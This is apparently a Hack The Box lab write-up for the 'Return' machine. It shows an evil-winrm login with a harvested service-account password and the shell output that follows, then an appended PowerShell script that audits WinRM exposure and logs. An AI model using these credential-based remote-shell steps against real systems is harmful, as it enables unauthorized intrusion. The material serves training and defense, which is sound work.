WinRM


Nmap initially discovered a WinRM service running on port 5985 of the target. However, nothing could be done with it at that time, as I didn't have a valid domain credential.

A moment later, I was able to obtain a valid domain credential by exploiting a misconfigured web application that manages the printers. I also learned that the compromised user is a member of the Remote Management Users group, which allows the user to WinRM directly into the target system. This was also confirmed through BloodHound at a later stage.

While all the information I had gathered so far made me believe that the next attack vector for lateral movement or privilege escalation would be related to exploiting the printer, I will first get a foothold on the target host.

┌──(kali㉿kali)-[~/archive/htb/labs/return]
└─$ evil-winrm -i printer.return.local -u svc-printer -p '1edFg43012!!'
 
Evil-WinRM shell v3.4
 
warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
 
data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
 
info: Establishing connection to remote endpoint
 
*evil-winrm* ps c:\Users\svc-printer\Documents> whoami
return\svc-printer
*evil-winrm* ps c:\Users\svc-printer\Documents> hostname
printer
*evil-winrm* ps c:\Users\svc-printer\Documents> ipconfig
 
Windows IP Configuration
 
 
ethernet adapter ethernet0:
 
   connection-specific dns suffix  . : htb
   ipv6 address. . . . . . . . . . . : dead:beef::1a2
   ipv6 address. . . . . . . . . . . : dead:beef::3ca0:8079:2c38:f2ac
   link-local ipv6 address . . . . . : fe80::3ca0:8079:2c38:f2ac%10
   ipv4 address. . . . . . . . . . . : 10.10.11.108
   subnet mask . . . . . . . . . . . : 255.255.254.0
   default gateway . . . . . . . . . : fe80::250:56ff:feb9:eec2%10
                                       10.10.10.2

Initial foothold established on the target system as the svc-printer user via evil-winrm.
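From the defender's side, the three conditions behind this foothold (WinRM exposed, a service account in Remote Management Users, and nobody watching inbound sessions) can be checked in one pass. The script below is an added example, not part of the original write-up; it uses the standard Windows group and log names, and the "svc" prefix used to flag service accounts is an assumption about the naming convention.

```powershell
# Added example (not from the original write-up): audit the conditions that
# made this WinRM foothold possible. Run in an elevated PowerShell on the host.

# 1. Is WinRM running, and which listeners exist (default HTTP listener is 5985)?
Get-Service -Name WinRM | Select-Object Name, Status, StartType
winrm enumerate winrm/config/listener

# 2. Who can open a remote shell here without being an administrator?
#    Membership in 'Remote Management Users' is enough. On a domain controller
#    the WinNT provider resolves the domain's built-in copy of the group.
$group   = [ADSI]"WinNT://./Remote Management Users,group"
$members = @($group.Invoke('Members') | ForEach-Object {
    $_.GetType().InvokeMember('ADsPath', 'GetProperty', $null, $_, $null)
})
Write-Host "Remote Management Users members: $($members.Count)"
foreach ($m in $members) {
    $name = $m -replace '^WinNT://', ''              # e.g. RETURN/svc-printer
    # Assumption: service accounts are named svc-* / svc_*; such accounts
    # rarely need interactive remoting and deserve a closer look.
    $flag = if ($name -match '/svc[-_]') { '  <-- service account with remoting rights' } else { '' }
    Write-Host "  $name$flag"
}

# 3. Who has actually used it? WinRM records every inbound shell creation as
#    Event ID 91 in its operational log ("Creating WSMan shell on server...").
#    Correlate with Security 4624 (logon type 3) to get the source address.
$filter = @{ LogName = 'Microsoft-Windows-WinRM/Operational'; Id = 91 }
Get-WinEvent -FilterHashtable $filter -MaxEvents 20 -ErrorAction SilentlyContinue |
    Select-Object TimeCreated, Id, Message |
    Format-Table -AutoSize -Wrap
```

If the operational log is empty, check that the Microsoft-Windows-WinRM/Operational channel is enabled, since it is what turns a quiet lateral movement over 5985 into a visible event.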